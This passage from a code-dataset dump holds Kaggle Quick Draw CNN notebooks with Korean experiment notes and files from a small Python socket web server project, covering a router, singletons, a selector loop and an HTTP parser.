'Valid Loss')\nax1.legend(loc = 'best')\n\nax2.plot(history.history['acc'], color = 'b', label = 'Train Accuracy')\nax2.plot(history.history['val_acc'], color = 'm', label = 'Valid Accuracy')\nax2.legend(loc = 'best')\n\n\n# # 7. Modeling with ResNet50\n\n# It's seem not good. Let's try other pre-trained model.\n\n# In[ ]:\n\n\n# ResNet50 Application \nmodel_r = ResNet50(include_top = True, weights= None, input_shape=(im_size, im_size, 3), classes = n_class)\n\n\n# In[ ]:\n\n\nmodel_r.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\nmodel_r.summary()\n\n\n# In[ ]:\n\n\nn_epochs = 5\nbatch_size = 50\n\n\n# In[ ]:\n\n\n# Fitting ResNet50\nhistory_r = model_r.fit(X_train, y_train, epochs = n_epochs, batch_size = batch_size, \n validation_split = .2, verbose = True)\n\n\n# In[ ]:\n\n\n# Train and validation curves with ResNet50\nfig, (ax1, ax2) = plt.subplots(2, 1)\nax1.plot(history_r.history['loss'], color = 'b', label = 'Train Loss')\nax1.plot(history_r.history['val_loss'], color = 'm', label = 'Valid Loss')\nax1.legend(loc = 'best')\n\nax2.plot(history_r.history['acc'], color = 'b', label = 'Train Accuracy')\nax2.plot(history_r.history['val_acc'], color = 'm', label = 'Valid Accuracy')\nax2.legend(loc = 'best')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n"
},
{
"alpha_fraction": 0.589798092842102,
"alphanum_fraction": 0.630778431892395,
"avg_line_length": 26.573259353637695,
"blob_id": "f93af518bb240fb5f3720211076bfc0dbb99dd71",
"content_id": "22da6b6e3267bffb542e2f293db40b0b0fb9b446",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18338,
"license_type": "no_license",
"max_line_length": 344,
"num_lines": 546,
"path": "/Quick_Draw_cnn.py",
"repo_name": "jominjimail/kaggle_first",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# \n# **Quick Draw** 게임을 해보니 제한 시간 안에 그림을 그리면 AI가 \"이건가요?\" \"저건가요?\" 말하다가 \"아 알겠어요 이건 만리장성입니다.\" 이런 게임이다. 사실 엄청나게 놀랬다. 완성된 그림을 주는 게 아니라 한 획, 한 획 그리는 와중에 정답을 말하는 AI의 성능이 대단하다고 생각했다. class가 340개라는 한정이 있지만 모든 사람이 동그라미조차도 같게 그리지 않으므로 만리장성을 맞춘 건 대단하다고 생각한다.\n# \n# 데이터셋을 받아서 구조 분석을 하는 데에는 Getting Started{[image-Based CNN](https://www.kaggle.com/jpmiller/image-based-cnn),[Quick Draw! - Simple EDA](https://www.kaggle.com/dimitreoliveira/quick-draw-simple-eda)} 커널을 참고했다. 나의 예상과는 다르게 인풋 데이터가 이미지가 아닌 선들의 좌표 배열이었다. 이 좌표를 이용해서 다시 이미지로 변환한 다음 input으로 사용할 예정이다. 이미지를 분류하는 데는 CNN이 성능이 가장 좋으니까 CNN을 포커스로 잡고 진행하였다.\n# \n# 데이터가 선 1, 선 2, 선 3 이런 식으로 시간의 속성이 들어가서 LSTM을 적용해도 괜찮을 것 같지만 자신 있는 CNN으로 과제를 진행하고 시간이 남는다면 바꿔보는 것도 괜찮을 것 같다.\n# \n# ***\n\n# # 1차 사용 방법 \n# \n# **CNN**<br>\n# 이미지의 데이터가 많은 상황에서 CNN은 최고의 성능을 낸다. \n# \n# **keras**<br>\n# 원래 tensorflow를 사용했었지만, 카글에서 keras를 처음 사용해봤다.<br>\n# input, kernel, output을 블록으로 설명한 부분이 인상 깊었고 tensorflow 기반으로 만들어져서 그런지 습득하고 사용하는데 많은 부담감은 없었다.<br>\n# 코드가 훨씬 깔끔하고 사용하기 쉽지만 keras가 tensorflow를 커버할 수 없다고 한다. 이는 좀 더 사용해봐야 알 것 같다.\n# \n# ***\n# \n# # 2차 사용 방법\n# \n# **배치 사이즈와 에폭수를 늘려보았다.** \n# \n# - batch_size = 32, epochs = 22 <br> \n# Private Score 0.60357 <br>\n# Public Score 0.60229\n# \n# - batch_size = 128, epochs = 50 <br>\n# Private Score 0.62959 <br>\n# Public Score 0.63262\n# \n# - batch_size = 128, epochs = 100 <br>\n# Private Score 0.62893 <br>\n# Public Score 0.62818\n# \n# 하이파라미터에 의존하는 것보단 다른 방법을 생각해봐야겠다.\n# \n# ***\n\n# \n# # 3차 사용 방법 \n# \n# 2차 사용 방법은 '전체 데이터셋을 한 번에 읽어오는 방법'이다. 최종적으로 (680000, 1025) 배열을 만들었다. <br>\n# keras 에서 model.fit_generator() 함수를 보고 스텝 바이 스텝으로 data generator를 만드는 것을 적용해보았다. \n# \n# ==> 실패했다. <br>\n# 왜 실패한 건지 도무지 모르겠다. 에폭이 증가하지 않는다. <br>\n# [Fork of Quick_Draw_FAIL](https://www.kaggle.com/rookiebox/fork-of-quick-draw-cnn-fail)커널에 기록해놨다.<br>\n# 모델의 input의 shape와 데이터의 shape를 맞춰주면 될 것 같았지만, 실행이 되지 않았다. 에러 메세지도 출력되지 않고 어느 순간 CPU의 점유율이 0%로 떨어졌다.\n# \n# ***\n# \n# # 4차 사용 방법\n# \n# 클래스 마다(.csv) 2500개의 값 중 (recognized == True) 을 만족하는 2000개의 값만 사용한다. <br>\n# 이를 무작정 10000 값으로 늘려봤다. 하지만 이 많은 데이터를 한 번에 로드하는 것은 메모리가 버티지 못해 문제가 생겼고(중간에 커널의 연결이 계속 off 되었다)<br>\n# '좌표를 이용해서 다시 이미지로 변환'하는 과정이 생각보다 너무 오래 걸려서 다른 방법을 생각해봐야 겠다.\n# \n# 기존 데이터셋의 [None, 32, 32, 1] 배열을 [None, 80, 2]로 바꿔보았다. <br>\n# 다른 코드를 살펴보니 x, y 값이 차례로 있다고 한다. 연속된 좌표의 패턴을 학습해보자.\n# 단, 이렇게 input 데이터의 shape를 바꾸면 기존에 사용했던 모델을 변경해야 한다.\n# \n# ==> 성공했다. <br>\n# 한 클래스당 사용하는 값의 수를 2000에서 10000으로 5배 늘렸다. <br>\n# 기존 [32,32] shape에서 [80,2] shape로 줄이니 연산속도가 더 빨랐고 더 많은 값을 사용할 수 있었다. <br>\n# 기존에 사용했던 2D Convolution을 1D Convolution 모델로 변경하고 돌려보았다.\n# \n# - epochs = 3 <br> \n# Private Score 0.71686<br>\n# Public Score 0.71671\n# - epochs = 10 <br> \n# Private Score 0.76240 <br>\n# Public Score 0.75738\n# - epochs = 30 <br> \n# Private Score <br>\n# Public Score \n# 30에서 강제 새로고침을 당했다...\n# - epochs = 25 <br> \n# Private Score 0.77515<br>\n# Public Score 0.77511\n# ***\n# \n# 아쉬운 점 <br>\n# keras의 EarlyStopping 함수를 사용해보고 싶었는데 callback으로 넣어주면 자꾸 에러가 생겨 진행이 안 돼서 뺐다. 그래서 어느 시점에 epoch을 멈춰야하는지 일일이 돌려봐야 했다. \n# \n# ***\n\n# ## training data 구조 분석\n# 'Getting Started' kernel을 참고했다.<br>\n# - glob 폴데에 있는 모든 파일 접근해서 list 형태로 변환\n# - tqdm for문의 상태바 보여줌\n\n# In[ ]:\n\n\nimport os\nimport re\nfrom glob import glob\nfrom tqdm import tqdm\nimport numpy as np\nimport pandas as pd\nimport ast\nimport matplotlib.pyplot as plt\nget_ipython().magic(u'matplotlib inline')\n\n\n# \n# \n\n# In[ ]:\n\n\nfnames = glob('../input/train_simplified/*.csv') #<class 'list'>\ncnames = ['countrycode', 'drawing', 'key_id', 'recognized', 'timestamp', 'word']\ndrawlist = []\nfor f in fnames[0:6]: # num of word : 5\n first = pd.read_csv(f, nrows=10) # make sure we get a recognized drawing\n first = first[first.recognized==True].head(2) # top head 2 get \n drawlist.append(first)\ndraw_df = pd.DataFrame(np.concatenate(drawlist), columns=cnames) # <class 'pandas.core.frame.DataFrame'>\ndraw_df\n\n\n# 그림 데이터는 아래와 같이 숫자들의 배열로 저장한다. \n# ```\n# drawing.values = [[선1점1, 선1점2, 선1점3, ... 선1점n], [선2점1, 선2점2, 선2점3, ... 선2점n], ..., [선i점1, 선i점2, 선i점3, ... 선i점n]]\n# ```\n\n# In[ ]:\n\n\ndraw_df.drawing.values[0]\n\n\n# In[ ]:\n\n\nevens = range(0,11,2)\nodds = range(1,12, 2)\n# We have drawing images, 2 per label, consecutively\ndf1 = draw_df[draw_df.index.isin(evens)]\ndf2 = draw_df[draw_df.index.isin(odds)]\n\nexample1s = [ast.literal_eval(pts) for pts in df1.drawing.values]\nexample2s = [ast.literal_eval(pts) for pts in df2.drawing.values]\nlabels = df2.word.tolist()\n\nfor i, example in enumerate(example1s):\n plt.figure(figsize=(6,3))\n \n for x,y in example:\n plt.subplot(1,2,1)\n plt.plot(x, y, marker='.')\n plt.axis('off')\n\n for x,y, in example2s[i]:\n plt.subplot(1,2,2)\n plt.plot(x, y, marker='.')\n plt.axis('off')\n label = labels[i]\n plt.title(label, fontsize=10)\n\n plt.show() \n\n\n# In[ ]:\n\n\nget_ipython().magic(u'reset -f')\n\n\n# ## 모델 만들기\n# \n# 이제 CNN 모델을 만들어보자.<br>\n# csv의 데이터에서 x, y점의 좌표를 읽어와 모델의 input으로 주기 위한 전처리 작업이 필요하다.\n# \n# - Dask 패키지는 Pandas 데이터프레임 형식으로 빅데이터를 처리하기 위한 파이썬 패키지이다.\n# \n# ### **코드의 주석은 1차 사용 방법의 주석입니다. **\n\n# In[ ]:\n\n\n\nimport os\nfrom glob import glob\nimport re\nimport ast\nimport numpy as np \nimport pandas as pd\nfrom PIL import Image, ImageDraw \nfrom tqdm import tqdm\nfrom dask import bag\nimport json\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Sequential\nfrom keras.models import Model\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras.metrics import top_k_categorical_accuracy\nfrom keras.layers import Input, Conv1D, Dense, Dropout, BatchNormalization, Flatten, MaxPool1D\nfrom tensorflow.keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, EarlyStopping\n\n\n# > The data are also available in a zip file (automatically extracted inside the Kernels environment).\n# > 카글은 대단하다.\n\n# In[ ]:\n\n\npath = '../input/train_simplified/'\nclassfiles = os.listdir(path)\n\nnumstonames = {i: v[:-4].replace(\" \", \"_\") for i, v in enumerate(classfiles)} # sleeping bag -> sleeping_bag\nfiles = [os.path.join(path, file) for i, file in enumerate(classfiles)]\nword_mapping = {file.split('/')[-1][:-4]:i for i, file in enumerate(files)}\n\nnum_classes = len(files) #340\nimheight, imwidth = 32, 32 # size of an image\nims_per_class = 2000 #max? # in the code above and above, there existed more than 100 thousand images per class(/label)\nsequence_length = 80\n\n\n# ## 1. TRAIN 데이터 만들기 \n# \n# 한 class 마다 (class 개수는 340) sleeping bag.csv 에서 15000 읽어온다. (단, 필요한 col인 'drawing', 'recognized'만 뽑아온다)<br>\n# 이중 'recognized' 가 'True' 인 애들 탑 10000 개를 뽑는다.\n# \n# **배열 X**<br>\n# sequence of x- 와 y-coordinates 의 패턴을 X 배열에 넣는다. [10000, 80, 2]<br>\n# X 배열의 차원을 줄여 [10000, 160] 배열을 만든다.\n# \n# **배열 y**<br>\n# y 배열에는 class를 구별할 수 있는 index 값을 넣어 [10000, 1] 배열을 만든다.\n# \n# X와 y 배열을 합쳐준다. [10000, 161]\n# \n# **배열 train_grand**<br>\n# [10000, 161] 을 'train_grand'에 append 해준다.<br>\n# shape을 변경해준다. [340, 10000, 161] -> [3400000, 161]\n# \n# \n# \n\n# In[ ]:\n\n\ntrain_grand= []\n\nclass_paths = glob('../input/train_simplified/*.csv')\n\ndf = []\n\nfor i,c in enumerate(tqdm(class_paths[0: num_classes])):\n train = pd.read_csv(c, usecols=['drawing', 'recognized'], nrows=15000) # [2500 rows x 2 columns]\n train = train[train.recognized == True].head(10000) # use data only recognized == True -> [2000 rows x 2 columns]\n \n X = []\n for values in train.drawing.values:\n image = json.loads(values)\n strokes = []\n for x_axis, y_axis in image:\n strokes.extend(list(zip(x_axis, y_axis)))\n strokes = np.array(strokes)\n pad = np.zeros((sequence_length, 2))\n if sequence_length>strokes.shape[0]:\n pad[:strokes.shape[0],:] = strokes\n else:\n pad = strokes[:sequence_length, :]\n X.append(pad)\n X = np.array(X)\n y = np.full((train.shape[0], 1), i)\n X = np.reshape(X, (10000, -1))\n X = np.concatenate((y, X), axis=1)\n train_grand.append(X)\n \n \n# trainarray = np.reshape(trainarray, (ims_per_class, -1)) # (2000, 1024)\n# labelarray = np.full((train.shape[0], 1), i) # (2000, 1) fill with 'i' 0~339\n# trainarray = np.concatenate((labelarray, trainarray), axis=1) # (2000, 1025)\n# train_grand.append(trainarray)\n\ntrain_grand = np.array([train_grand.pop() for i in np.arange(num_classes)]) \nprint(train_grand.shape)\ntrain_grand = train_grand.reshape((-1, sequence_length*2+1))\nprint(train_grand.shape)\n\ndel X\ndel train\n\n\n# ## 2. TRAIN, VALIDATION data 나누기\n# \n# 전체 데이터 셋 3400000중 10%는 validation data로 90%는 train data로 사용한다.\n# \n# y_train : (3060000, 340)\n# \n# X_train : (3060000, 80, 2) \n# \n# y_val : (340000, 340) \n# \n# X_val : (340000, 80, 2)\n# \n\n# > keras.utils.to_categorical() 은 \n# > \n# > ex: y_tain=[0,2,1,2,0] 이라하면, \n# > y_train= [[ 1., 0., 0.],\n# > [ 0., 0., 1.],\n# > [ 0., 1., 0.],\n# > [ 0., 0., 1.],\n# > [ 1., 0., 0.]] 로 변경된다.\n\n# In[ ]:\n\n\nvalfrac = 0.1 \ncutpt = int(valfrac * train_grand.shape[0])\nprint(cutpt)\n\nnp.random.shuffle(train_grand)\ny_train, X_train = train_grand[cutpt: , 0], train_grand[cutpt: , 1:]\ny_val, X_val = train_grand[0:cutpt, 0], train_grand[0:cutpt, 1:]\n\ndel train_grand\n\ny_train = keras.utils.to_categorical(y_train, num_classes)\nX_train = X_train.reshape(-1, sequence_length,2)\n\ny_val = keras.utils.to_categorical(y_val, num_classes)\nX_val = X_val.reshape(-1, sequence_length,2)\n\nprint(y_train.shape, \"\\n\",\n X_train.shape, \"\\n\",\n y_val.shape, \"\\n\",\n X_val.shape)\n\n\n# ## 3. keras 를 이용해 model 정의하기\n# \n# x, y 의 sequece pattern을 파악하기 위해 conv1을 사용했다.\n# \n\n# > Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu', input_shape=(imheight, imwidth, 1))\n# > - 입력 : (32, 32) 채널은 1개\n# > - 중간 : (3, 3)커널 필터개수 32개\n# > - 아웃 : (32, 32) 채널은 32개\n# > - 가중치 개수 : 3x3x32 = 288개\n# > - 참고로 케라스 코드에서는 가장 첫번째 레이어를 제외하고는 입력 형태를 자동으로 계산하므로 이 부분은 신경쓰지 않아도 됩니다.\n# > \n# > model.add(MaxPooling2D(pool_size=(2, 2)))\n# > - pool_size=(수직, 수평) 비율 즉, 크기를 반으로 줄입니다.\n# >\n# >Conv1D\tExtracts local features using 1D filters.\n# >필터를 이용하여 지역적인 특징을 추출합니다.\n\n# In[ ]:\n\n\n\n# model = Sequential()\n# model.add(Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu', input_shape=(isequence_length,2)))\n# model.add(MaxPooling2D(pool_size=(2, 2)))\n\n# model.add(Conv2D(64, kernel_size=(3, 3), padding='same', activation='relu'))\n# model.add(MaxPooling2D(pool_size=(2, 2)))\n# model.add(Dropout(0.2))\n\n# model.add(Flatten())\n# model.add(Dense(680, activation='relu'))\n# model.add(Dropout(0.5))\n# model.add(Dense(num_classes, activation='softmax'))\n\n# model.summary()\n\n\n# In[ ]:\n\n\ndef createNetwork(seq_len):\n \n # Function to add a convolution layer with batch normalization\n def addConv(network, features, kernel):\n network = BatchNormalization()(network)\n return Conv1D(features, kernel, padding='same', activation='relu')(network)\n \n # Function to add a dense layer with batch normalization and dropout\n def addDense(network, size):\n network = BatchNormalization()(network)\n network = Dropout(0.2)(network)\n return Dense(size, activation='relu')(network)\n \n \n # Input layer\n input = Input(shape=(seq_len, 2))\n network = input\n \n # Add 1D Convolution\n for features in [16, 24, 32]:\n network = addConv(network, features, 5)\n network = MaxPool1D(pool_size=5)(network)\n \n # Add 1D Convolution\n for features in [64, 96, 128]:\n network = addConv(network, features, 5)\n network = MaxPool1D(pool_size=5)(network)\n\n # Add 1D Convolution\n for features in [256, 384, 512]:\n network = addConv(network, features, 5)\n #network = MaxPool1D(pool_size=5)(network)\n\n # Flatten\n network = Flatten()(network)\n \n # Dense layer for combination\n for size in [128, 128]:\n network = addDense(network, size)\n \n # Output layer\n output = Dense(len(files), activation='softmax')(network)\n\n\n # Create and compile model\n model = Model(inputs = input, outputs = output)\n# model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc'])\n\n# # Display model\n# model.summary()\n return model\n\nmodel = createNetwork(sequence_length)\n\n\n# ## 4. 정의한 모델 사용하기\n# 모델을 정의했으니 모델에 손실함수와 최적화 알고리즘을 적용해보자.\n# \n# model.compile()\n# - 다중 클래스 문제이므로 ‘categorical_crossentropy’으로 지정\n# - 경사 하강법 알고리즘 중 하나인 ‘adam’을 사용\n# - 평가 척도를 나타내며 분류 문제에서는 일반적으로 ‘accuracy’으로 지정\n# \n# 모델을 학습시켜보자\n# \n# model.fit() \n# - 훈련 데이터셋 , batch 사이즈, epoch 수, 검증 데이터셋, 학습 중 출력되는 문구 설정\n\n# In[ ]:\n\n\ndef top_3_accuracy(x,y): \n t3 = top_k_categorical_accuracy(x,y, 3)\n return t3\n\nreduceLROnPlat = ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=3, \n verbose=1, mode='auto', min_delta=0.005, cooldown=5, min_lr=0)\n\nearlystop = EarlyStopping(monitor='val_loss', mode='auto', patience=2,verbose=0) \n\n#callbacks = [reduceLROnPlat, earlystop]\n#callbacks = earlystop\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy', top_3_accuracy])\n\nmodel.summary()\n\n# model.fit(x=X_train, y=y_train,\n# batch_size = 1000,\n# epochs = 100,\n# validation_data = (X_val, y_val),\n# callbacks = callbacks,\n# verbose = 1)\nmodel.fit(x=X_train, y=y_train,\n batch_size = 1000,\n epochs = 25,\n validation_data = (X_val, y_val),\n verbose = 1)\n\n\n# ## 5. TEST SET 돌리기\n# \n# 잘 돌아가는걸 확인했다.\n# \n# 이제 test set 을 넣어보자.\n# \n# model.predict()\n\n# In[ ]:\n\n\n#%% get test set\nttvlist = []\nreader = pd.read_csv('../input/test_simplified.csv', index_col=['key_id'],\n chunksize=2048)\n\nfor chunk in tqdm(reader, total=55):\n X =[]\n for values in chunk.drawing.values:\n image = json.loads(values)\n strokes = []\n for x_axis, y_axis in image:\n strokes.extend(list(zip(x_axis, y_axis)))\n strokes = np.array(strokes)\n pad = np.zeros((sequence_length, 2))\n if sequence_length>strokes.shape[0]:\n pad[:strokes.shape[0],:] = strokes\n else:\n pad = strokes[:sequence_length, :]\n X.append(pad)\n \n X = np.array(X)\n X = np.reshape(X, (-1,sequence_length, 2))\n testpreds = model.predict(X, verbose=0)\n ttvs = np.argsort(-testpreds)[:, 0:3]\n ttvlist.append(ttvs)\n# imagebag = bag.from_sequence(chunk.drawing.values).map(draw_it)\n# testarray = np.array(imagebag.compute())\n\n# testarray = np.reshape(testarray, (testarray.shape[0], imheight, imwidth, 1))\n# testpreds = model.predict(testarray, verbose=0)\n# ttvs = np.argsort(-testpreds)[:, 0:3] # top 3\n# ttvlist.append(ttvs)\n \nttvarray = np.concatenate(ttvlist)\n\n\n# In[ ]:\n\n\npreds_df = pd.DataFrame({'first': ttvarray[:,0], 'second': ttvarray[:,1], 'third': ttvarray[:,2]})\npreds_df = preds_df.replace(numstonames)\npreds_df['words'] = preds_df['first'] + \" \" + preds_df['second'] + \" \" + preds_df['third']\n\nsub = pd.read_csv('../input/sample_submission.csv', index_col=['key_id'])\nsub['word'] = preds_df.words.values\nsub.to_csv('subcnn_small.csv')\nsub.head()\n\n"
}
] | 3 |
uiandwe/python_web_server
|
https://github.com/uiandwe/python_web_server
|
99145a93ca4ffe14bcb2be725085f6a1ef8e2212
|
e337d08056e3864d34b5613a72d4dfbbfd4b9c33
|
4107931dc4b25cb0e2d789e3f572f57a2787208a
|
refs/heads/develop
| 2023-05-24T18:03:55.649070 | 2020-01-05T12:56:12 | 2020-01-05T12:56:12 | 228,391,870 | 1 | 0 | null | 2019-12-16T13:19:52 | 2022-05-24T00:23:46 | 2023-05-22T22:37:12 |
Python
|
[
{
"alpha_fraction": 0.6403669714927673,
"alphanum_fraction": 0.642201840877533,
"avg_line_length": 29.27777862548828,
"blob_id": "17b5cfb4fb83cdf64db5fc75da07258dd7ac5adf",
"content_id": "16b702314c6689c321292abd9d6af452d54120f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 545,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 18,
"path": "/http_handler/urls.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom apis.books import BooksAPI\nfrom apis.homes import HomesAPI\nfrom apis.orders import OrdersApi\nfrom router.router import Router\n\n__all__ = (\n 'router'\n)\n\nmapping_list = [\n (r\"/\", {\"GET\": HomesAPI.do_index, \"POST\": HomesAPI.do_create}),\n (r\"/api/books/\", {\"GET\": BooksAPI.do_index, \"POST\": BooksAPI.do_create}),\n (r\"/api/books/{id:int}/\", {\"GET\": BooksAPI.do_index, \"PUT\": BooksAPI.do_create}),\n (r\"/api/orders/\", {\"GET\": OrdersApi.do_show, \"POST\": OrdersApi.do_update})\n]\n\nrouter = Router(mapping_list)\n"
},
{
"alpha_fraction": 0.5481336116790771,
"alphanum_fraction": 0.5540274977684021,
"avg_line_length": 21.622222900390625,
"blob_id": "5c04b8f82abe2b96bab6b9cc6e7a1393655d968c",
"content_id": "ddcf2b334bff56abe3aefc06097d72f10f870158",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1068,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 45,
"path": "/utils/klass/singleton.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# https://wikidocs.net/3693\n\n__all__ = (\n 'Singleton'\n)\n\n\nclass Singleton(type):\n \"\"\"\n 상속용 싱글턴\n \"\"\"\n def __init__(cls, name, bases, dict):\n super(Singleton, cls).__init__(name, bases, dict)\n cls.instance = None\n\n def __call__(cls, *args, **kw):\n if cls.instance is None:\n cls.instance = super(Singleton, cls).__call__(*args, **kw)\n return cls.instance\n\n\nclass SingletonInheritance(type):\n \"\"\"\n 상속용 싱글턴 2\n \"\"\"\n _instances = {}\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(SingletonInheritance, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n\ndef singleton_decorator(class_):\n \"\"\"\n 데코레이터용 싱글턴, siaticMethod 접근 불가\n \"\"\"\n instances = {}\n\n def getinstance(*args, **kwargs):\n if class_ not in instances:\n instances[class_] = class_(*args, **kwargs)\n return instances[class_]\n return getinstance\n"
},
{
"alpha_fraction": 0.6357142925262451,
"alphanum_fraction": 0.6392857432365417,
"avg_line_length": 20.538461685180664,
"blob_id": "41f088d4d7990f4cff1b7c362bab53a2dbe58a04",
"content_id": "eed01887521f2bff0f56653720876407bc0225b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 280,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 13,
"path": "/http_handler/methods.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport inspect\nfrom typing import List\n\n\nclass Methods:\n @classmethod\n def do_options(cls, req: dict) -> List:\n return inspect.getmembers(cls, predicate=inspect.ismethod)\n\n @staticmethod\n def do_head(req: dict) -> str:\n return ''\n"
},
{
"alpha_fraction": 0.5468219518661499,
"alphanum_fraction": 0.554099977016449,
"avg_line_length": 29.761194229125977,
"blob_id": "a9463de3454d51d6180d91c1a0f010a212d42cd8",
"content_id": "0a0e044bf2fce14844f4fa44ec1f8d53790c19cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2061,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 67,
"path": "/http_handler/web_server.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport selectors\nimport socket\nfrom _thread import start_new_thread\n\nfrom logger import Logger\nfrom http_handler.handle import Handle\nfrom utils import args_to_str\n\nLOG = Logger().log\n\n__all__ = (\n 'WebServer'\n)\n\n\nclass WebServer:\n __slots__ = [\"host\", \"port\", \"lsock\", \"sel\"]\n\n def __init__(self, host=\"127.0.0.1\", port=65432):\n self.host = host\n self.port = port\n self.lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sel = selectors.DefaultSelector()\n\n def __call__(self, *args, **kwargs):\n self.lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.lsock.bind((self.host, self.port))\n self.lsock.listen()\n\n LOG.info(args_to_str(\"listen on \", (self.host, self.port)))\n\n self.lsock.setblocking(False)\n self.sel.register(self.lsock, selectors.EVENT_READ, data=None)\n\n try:\n while True:\n events = self.sel.select(timeout=10)\n for key, mask in events:\n if key.data is None:\n self.accept_handler(key.fileobj)\n else:\n handle_obj = key.data\n try:\n handle_obj.process_events(mask)\n except Exception as e:\n LOG.error(e)\n handle_obj.close()\n except KeyboardInterrupt:\n LOG.info(\"close server \")\n finally:\n self.sel.close()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.sel.close()\n\n def accept_handler(self, sock):\n conn, addr = sock.accept()\n LOG.info(args_to_str(\"accepted connection from \", addr))\n conn.setblocking(False)\n\n start_new_thread(self.thread_socket, (conn, addr))\n\n def thread_socket(self, conn, addr):\n events = selectors.EVENT_READ | selectors.EVENT_WRITE\n handle_obj = Handle(self.sel, conn, addr)\n self.sel.register(conn, events, data=handle_obj)\n"
},
{
"alpha_fraction": 0.5562078356742859,
"alphanum_fraction": 0.5647196769714355,
"avg_line_length": 27.872880935668945,
"blob_id": "fec47ef49f2dbcac373261ac7c5f3e9ac35a11c2",
"content_id": "647fc10794da4709b0bc116717405ad58b4d787a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3431,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 118,
"path": "/parser/parser.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom abc import ABCMeta, abstractmethod\nfrom email._policybase import compat32\nfrom email.parser import FeedParser\nfrom io import StringIO\n\nfrom http_handler import HTTPContentType\nfrom logger import Logger\n\nLOG = Logger().log\n\nresponse_content_type = {\n v.name: v.value for v in HTTPContentType.__members__.values()\n}\n\n__all__ = (\n 'ParserHttp'\n)\n\n\nclass ParserImp:\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def parser_request(self, request_line: str) -> dict:\n raise NotImplementedError()\n\n @abstractmethod\n def parser_headers(self, request_headers: str) -> list:\n raise NotImplementedError()\n\n @abstractmethod\n def parser_url_params(self, params_arr: list) -> dict:\n raise NotImplementedError()\n\n\nclass ParserHttp(ParserImp):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, *args, **kwargs):\n req_line, headers_alone = args[0].split(b'\\r\\n', 1)\n\n req_line = self.parser_request(req_line)\n\n request_headers = self.parser_headers(headers_alone)\n\n return req_line, request_headers\n\n def parser_request(self,\n req_data: bytes) -> dict:\n \"\"\"\n method, url, http protocol, http version, url params, 파서\n ex data) 'GET /static/css/main.css?file_version=1 HTTP/1.1'\n \"\"\"\n\n req_infos = req_data.decode('utf-8').split(' ')\n\n method, urls, protocol, base_version_num, version_num = self.get_req_infos(req_infos)\n\n url_params = []\n origin_url = urls[0]\n\n file_type = origin_url.split(\"/\")[-1]\n content_type = self.find_file_type(file_type)\n\n if len(urls) > 1:\n url_params = self.parser_url_params(urls[1:])\n\n return {\"method\": method,\n \"url\": origin_url,\n \"protocol\": protocol,\n \"version\": version_num,\n \"params\": url_params,\n 'content_type': content_type}\n\n def get_req_infos(self, req_infos: list) -> tuple:\n method = req_infos[0]\n urls = req_infos[1].split('?')\n protocol = req_infos[2]\n base_version_num = protocol.split('/', 1)[1]\n version_num = tuple(base_version_num.split(\".\"))\n\n return method, urls, protocol, base_version_num, version_num\n\n def find_file_type(self, file_type: str) -> str:\n if file_type and file_type.find(\".\") > 0:\n file_type = file_type.split(\".\")[-1]\n return response_content_type[file_type.upper()]\n return response_content_type['HTML']\n\n def parser_url_params(self,\n params_arr: list) -> dict:\n \"\"\"\n url 파라미터 파서\n \"\"\"\n params_dict = {}\n if len(params_arr) > 0:\n for param in params_arr:\n param_split = param.split(\"=\")\n params_dict[param_split[0]] = param_split[1]\n return params_dict\n\n def parser_headers(self,\n request_headers: str) -> list:\n \"\"\"\n 헤더 파서\n \"\"\"\n text = request_headers.decode('ASCII', errors='surrogateescape')\n fp = StringIO(text)\n feed_parser = FeedParser(None, policy=compat32)\n while True:\n data = fp.read(8192)\n if not data:\n break\n feed_parser.feed(data)\n return feed_parser.close()\n"
},
{
"alpha_fraction": 0.6246851682662964,
"alphanum_fraction": 0.6288833022117615,
"avg_line_length": 24.89130401611328,
"blob_id": "225b08b3953844ca35d6af820f7ea9889140efd7",
"content_id": "15ac7b6764a38489778b5c43ebc0568696648c07",
"detected_licenses": [],
